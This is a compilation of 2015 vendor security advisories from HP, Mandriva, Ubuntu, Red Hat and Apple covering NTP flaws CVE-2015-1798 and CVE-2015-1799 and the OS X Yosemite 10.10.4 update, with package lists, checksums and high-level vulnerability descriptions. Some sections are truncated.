Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799 http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities
Updated Packages:
Mandriva Business Server 1/X86_64: b0f98e6b8700e3e3413582fe28d1ba06 mbs1/x86_64/ntp-4.2.6p5-8.4.mbs1.x86_64.rpm d864780718c95368bf9ec81643e35e5d mbs1/x86_64/ntp-client-4.2.6p5-8.4.mbs1.x86_64.rpm 6f457df52d46fb8e6b0fe44aead752eb mbs1/x86_64/ntp-doc-4.2.6p5-8.4.mbs1.x86_64.rpm b4bff3de733ea6d2839a77a9211ce02b mbs1/SRPMS/ntp-4.2.6p5-8.4.mbs1.src.rpm
Mandriva Business Server 2/X86_64: e9ac2f3465bcc50199aef8a4d553927f mbs2/x86_64/ntp-4.2.6p5-16.3.mbs2.x86_64.rpm cf2970c3c56efbfa84f964532ad64544 mbs2/x86_64/ntp-client-4.2.6p5-16.3.mbs2.x86_64.rpm 1ae1b1d3c2e7bdea25c01c33652b6169 mbs2/x86_64/ntp-doc-4.2.6p5-16.3.mbs2.noarch.rpm d250433009fd187361bda6338dc5eede mbs2/SRPMS/ntp-4.2.6p5-16.3.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. ============================================================================ Ubuntu Security Notice USN-2567-1 April 13, 2015
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. (CVE-2015-1798)
Miroslav Lichvar discovered that NTP incorrectly handled certain invalid packets. A remote attacker could possibly use this issue to cause a denial of service. This issue could either cause ntp-keygen to hang, or could result in non-random keys. (CVE number pending)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.3
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.3
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.4
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ntp security, bug fix, and enhancement update Advisory ID: RHSA-2015:2231-04 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html Issue date: 2015-11-19 CVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 CVE-2015-3405 =====================================================================
- Summary:
Updated ntp packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
It was found that because NTP's access control was based on a source IP address, an attacker could bypass source IP restrictions and send malicious control and configuration packets by spoofing ::1 addresses. (CVE-2014-9298, CVE-2014-9751)
A denial of service flaw was found in the way NTP hosts that were peering with each other authenticated themselves before updating their internal state variables. An attacker could send packets to one peer host, which could cascade to other peers, and stop the synchronization process among the reached peers. (CVE-2015-1799)
A flaw was found in the way the ntp-keygen utility generated MD5 symmetric keys on big-endian systems. An attacker could possibly use this flaw to guess generated MD5 keys, which could then be used to spoof an NTP client or server. (CVE-2015-3405)
A stack-based buffer overflow was found in the way the NTP autokey protocol was implemented. When an NTP client decrypted a secret received from an NTP server, it could cause that client to crash. (CVE-2014-9297, CVE-2014-9750)
It was found that ntpd did not check whether a Message Authentication Code (MAC) was present in a received packet when ntpd was configured to use symmetric cryptographic keys. A man-in-the-middle attacker could use this flaw to send crafted packets that would be accepted by a client or a peer without the attacker knowing the symmetric key. (CVE-2015-1798)
The CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav Lichvár of Red Hat.
Bug fixes:
-
The ntpd service truncated symmetric keys specified in the key file to 20 bytes. As a consequence, it was impossible to configure NTP authentication to work with peers that use longer keys. With this update, the maximum key length has been changed to 32 bytes. (BZ#1191111)
-
The ntpd service could previously join multicast groups only when starting, which caused problems if ntpd was started during system boot before network was configured. With this update, ntpd attempts to join multicast groups every time network configuration is changed. (BZ#1207014)
-
Previously, the ntp-keygen utility used the exponent of 3 when generating RSA keys. Consequently, generating RSA keys failed when FIPS mode was enabled. With this update, ntp-keygen has been modified to use the exponent of 65537, and generating keys in FIPS mode now works as expected. (BZ#1191116)
-
The ntpd service dropped incoming NTP packets if their source port was lower than 123 (the NTP port). With this update, ntpd no longer checks the source port number, and clients behind NAT are now able to correctly synchronize with the server. (BZ#1171640)
Enhancements:
-
This update adds support for configurable Differentiated Services Code Points (DSCP) in NTP packets, simplifying configuration in large networks where different NTP implementations or versions are using different DSCP values. (BZ#1202828)
-
This update adds the ability to configure separate clock stepping thresholds for each direction (backward and forward). Use the "stepback" and "stepfwd" options to configure each threshold. (BZ#1193154)
-
Support for nanosecond resolution has been added to the Structural Health Monitoring (SHM) reference clock. Prior to this update, when a Precision Time Protocol (PTP) hardware clock was used as a time source to synchronize the system clock, the accuracy of the synchronization was limited due to the microsecond resolution of the SHM protocol. The nanosecond extension in the SHM protocol now allows sub-microsecond synchronization of the system clock. (BZ#1117702)
All ntp users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1117702 - SHM refclock doesn't support nanosecond resolution 1122012 - SHM refclock allows only two units with owner-only access 1171640 - NTP drops requests when sourceport is below 123 1180721 - ntp: mreadvar command crash in ntpq 1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1 1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated 1191108 - ntpd should warn when monitoring facility can't be disabled due to restrict configuration 1191122 - ntpd -x steps clock on leap second 1193154 - permit differential fwd/back threshold for step vs. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
aarch64: ntp-4.2.6p5-22.el7.aarch64.rpm ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm ntpdate-4.2.6p5-22.el7.aarch64.rpm
ppc64: ntp-4.2.6p5-22.el7.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm ntpdate-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-4.2.6p5-22.el7.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm ntpdate-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-4.2.6p5-22.el7.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm ntpdate-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: ntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm sntp-4.2.6p5-22.el7.aarch64.rpm
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm sntp-4.2.6p5-22.el7.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm sntp-4.2.6p5-22.el7.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-22.el7.s390x.rpm sntp-4.2.6p5-22.el7.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-22.el7.src.rpm
x86_64: ntp-4.2.6p5-22.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm ntpdate-4.2.6p5-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7.noarch.rpm ntp-perl-4.2.6p5-22.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm sntp-4.2.6p5-22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-9297 https://access.redhat.com/security/cve/CVE-2014-9298 https://access.redhat.com/security/cve/CVE-2014-9750 https://access.redhat.com/security/cve/CVE-2014-9751 https://access.redhat.com/security/cve/CVE-2015-1798 https://access.redhat.com/security/cve/CVE-2015-1799 https://access.redhat.com/security/cve/CVE-2015-3405 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3 1hLTu5I/PUzWOnD8rRIlZQ== =sWdG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005
OS X Yosemite v10.10.4 and Security Update 2015-005 are now available and address the following:
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A process may gain admin privileges without proper authentication Description: An issue existed when checking XPC entitlements. This issue was addressed through improved entitlement checking. CVE-ID CVE-2015-3671 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A non-admin user may obtain admin rights Description: An issue existed in the handling of user authentication. This issue was addressed through improved error checking. CVE-ID CVE-2015-3672 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may abuse Directory Utility to gain root privileges Description: Directory Utility was able to be moved and modified to achieve code execution within an entitled process. This issue was addressed by limiting the disk location that writeconfig clients may be executed from. CVE-ID CVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec
afpserver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the AFP server. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3674 : Dean Jerkovich of NCC Group
apache Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may be able to access directories that are protected with HTTP authentication without knowing the correct credentials Description: The default Apache configuration did not include mod_hfs_apple. If Apache was manually enabled and the configuration was not changed, some files that should not be accessible might have been accessible using a specially crafted URL. This issue was addressed by enabling mod_hfs_apple. CVE-ID CVE-2015-3675 : Apple
apache Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities exist in PHP, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.24 and 5.4.40. These were addressed by updating PHP to versions 5.5.24 and 5.4.40. CVE-ID CVE-2015-0235 CVE-2015-0273
AppleGraphicsControl Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in AppleGraphicsControl which could have led to the disclosure of kernel memory layout. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3676 : Chen Liang of KEEN Team
AppleFSCompression Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in LZVN compression that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3677 : an anonymous researcher working with HP's Zero Day Initiative
AppleThunderboltEDMService Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the handling of certain Thunderbolt commands from local processes. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3678 : Apple
ATS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in handling of certain fonts. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3679 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3680 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3682 : Nuode Wei
Bluetooth Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the Bluetooth HCI interface. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze Networks
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may be able to intercept network traffic Description: An intermediate certificate was incorrectly issued by the certificate authority CNNIC. This issue was addressed through the addition of a mechanism to trust only a subset of certificates issued prior to the mis-issuance of the intermediate. Further details are available at https://support.apple.com/en-us/HT204938
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork HTTPAuthentication Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Following a maliciously crafted URL may lead to arbitrary code execution Description: A memory corruption issue existed in handling of certain URL credentials. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3684 : Apple
CoreText Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted text file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the processing of text files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1157 CVE-2015-3685 : Apple CVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3689 : Apple
coreTLS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: coreTLS accepted short ephemeral Diffie-Hellman (DH) keys, as used in export-strength ephemeral DH cipher suites. This issue, also known as Logjam, allowed an attacker with a privileged network position to downgrade security to 512-bit DH if the server supported an export-strength ephemeral DH cipher suite. The issue was addressed by increasing the default minimum size allowed for DH ephemeral keys to 768 bits. CVE-ID CVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck
DiskImages Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An information disclosure issue existed in the processing of disk images. This issue was addressed through improved memory management. CVE-ID CVE-2015-3690 : Peter Rutenbar working with HP's Zero Day Initiative
Display Drivers Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An issue existed in the Monitor Control Command Set kernel extension by which a userland process could control the value of a function pointer within the kernel. The issue was addressed by removing the affected interface. CVE-ID CVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze Networks
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application with root privileges may be able to modify EFI flash memory Description: An insufficient locking issue existed with EFI flash when resuming from sleep states. This issue was addressed through improved locking. CVE-ID CVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah and Corey Kallenberg of LegbaCore LLC, Pedro Vilaca
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may induce memory corruption to escalate privileges Description: A disturbance error, also known as Rowhammer, exists with some DDR3 RAM that could have led to memory corruption. This issue was mitigated by increasing memory refresh rates. CVE-ID CVE-2015-3693 : Mark Seaborn and Thomas Dullien of Google, working from original research by Yoongu Kim et al (2014)
FontParser Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team
Graphics Driver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An out of bounds write issue existed in NVIDIA graphics driver. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3712 : Ian Beer of Google Project Zero
Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple buffer overflow issues exist in the Intel graphics driver, the most serious of which may lead to arbitrary code execution with system privileges Description: Multiple buffer overflow issues existed in the Intel graphics driver. These were addressed through additional bounds checks. CVE-ID CVE-2015-3695 : Ian Beer of Google Project Zero CVE-2015-3696 : Ian Beer of Google Project Zero CVE-2015-3697 : Ian Beer of Google Project Zero CVE-2015-3698 : Ian Beer of Google Project Zero CVE-2015-3699 : Ian Beer of Google Project Zero CVE-2015-3700 : Ian Beer of Google Project Zero CVE-2015-3701 : Ian Beer of Google Project Zero CVE-2015-3702 : KEEN Team
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities existed in libtiff, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libtiff versions prior to 4.0.4. They were addressed by updating libtiff to version 4.0.4. CVE-ID CVE-2014-8127 CVE-2014-8128 CVE-2014-8129 CVE-2014-8130
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted .tiff file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of .tiff files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3703 : Apple
Install Framework Legacy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Several issues existed in how Install.framework's 'runner' setuid binary dropped privileges. This was addressed by properly dropping privileges. CVE-ID CVE-2015-3704 : Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOAcceleratorFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3705 : KEEN Team CVE-2015-3706 : KEEN Team
IOFireWireFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple null pointer dereference issues existed in the FireWire driver. These issues were addressed through improved error checking. CVE-ID CVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze Networks
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of APIs related to kernel extensions which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3720 : Stefan Esser
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of HFS parameters which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3721 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to overwrite arbitrary files Description: kextd followed symbolic links while creating a new file. This issue was addressed through improved handling of symbolic links. CVE-ID CVE-2015-3708 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A local user may be able to load unsigned kernel extensions Description: A time-of-check time-of-use (TOCTOU) race condition condition existed while validating the paths of kernel extensions. This issue was addressed through improved checks to validate the path of the kernel extensions. CVE-ID CVE-2015-3709 : Ian Beer of Google Project Zero
Mail Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A maliciously crafted email can replace the message content with an arbitrary webpage when the message is viewed Description: An issue existed in the support for HTML email which allowed message content to be refreshed with an arbitrary webpage. The issue was addressed through restricted support for HTML content. CVE-ID CVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek
ntfs Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in NTFS that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3711 : Peter Rutenbar working with HP's Zero Day Initiative
ntp Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker in a privileged position may be able to perform a denial of service attack against two ntp clients Description: Multiple issues existed in the authentication of ntp packets being received by configured end-points. These issues were addressed through improved connection state management. CVE-ID CVE-2015-1798 CVE-2015-1799
OpenSSL Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Multiple issues exist in OpenSSL, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers Description: Multiple issues existed in OpenSSL 0.9.8zd which were addressed by updating OpenSSL to version 0.9.8zf. CVE-ID CVE-2015-0209 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0293
QuickTime Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3661 : G. Geshev working with HP's Zero Day Initiative CVE-2015-3662 : kdot working with HP's Zero Day Initiative CVE-2015-3663 : kdot working with HP's Zero Day Initiative CVE-2015-3666 : Steven Seeley of Source Incite working with HP's Zero Day Initiative CVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs, Ryan Pentney, and Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3668 : Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3713 : Apple
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework code for parsing S/MIME e-mail and some other signed or encrypted objects. This issue was addressed through improved validity checking. CVE-ID CVE-2013-1741
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Tampered applications may not be prevented from launching Description: Apps using custom resource rules may have been susceptible to tampering that would not have invalidated the signature. This issue was addressed with improved resource validation. CVE-ID CVE-2015-3714 : Joshua Pitts of Leviathan Security Group
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to bypass code signing checks Description: An issue existed where code signing did not verify libraries loaded outside the application bundle. This issue was addressed with improved bundle verification. CVE-ID CVE-2015-3715 : Patrick Wardle of Synack
Spotlight Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Searching for a malicious file with Spotlight may lead to command injection Description: A command injection vulnerability existed in the handling of filenames of photos added to the local photo library. This issue was addressed through improved input validation. CVE-ID CVE-2015-3716 : Apple
SQLite Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in SQLite's printf implementation. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-3717 : Peter Rutenbar working with HP's Zero Day Initiative
System Stats Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious app may be able to compromise systemstatsd Description: A type confusion issue existed in systemstatsd's handling of interprocess communication. By sending a maliciously formatted message to systemstatsd, it may have been possible to execute arbitrary code as the systemstatsd process. The issue was addressed through additional type checking. CVE-ID CVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze Networks
TrueTypeScaler Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team
zip Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Extracting a maliciously crafted zip file using the unzip tool may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of zip files. These issues were addressed through improved memory handling. CVE-ID
CVE-2014-8139 CVE-2014-8140 CVE-2014-8141
OS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. https://support.apple.com/en-us/HT204950
OS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2 Comment: GPGTools - http://gpgtools.org
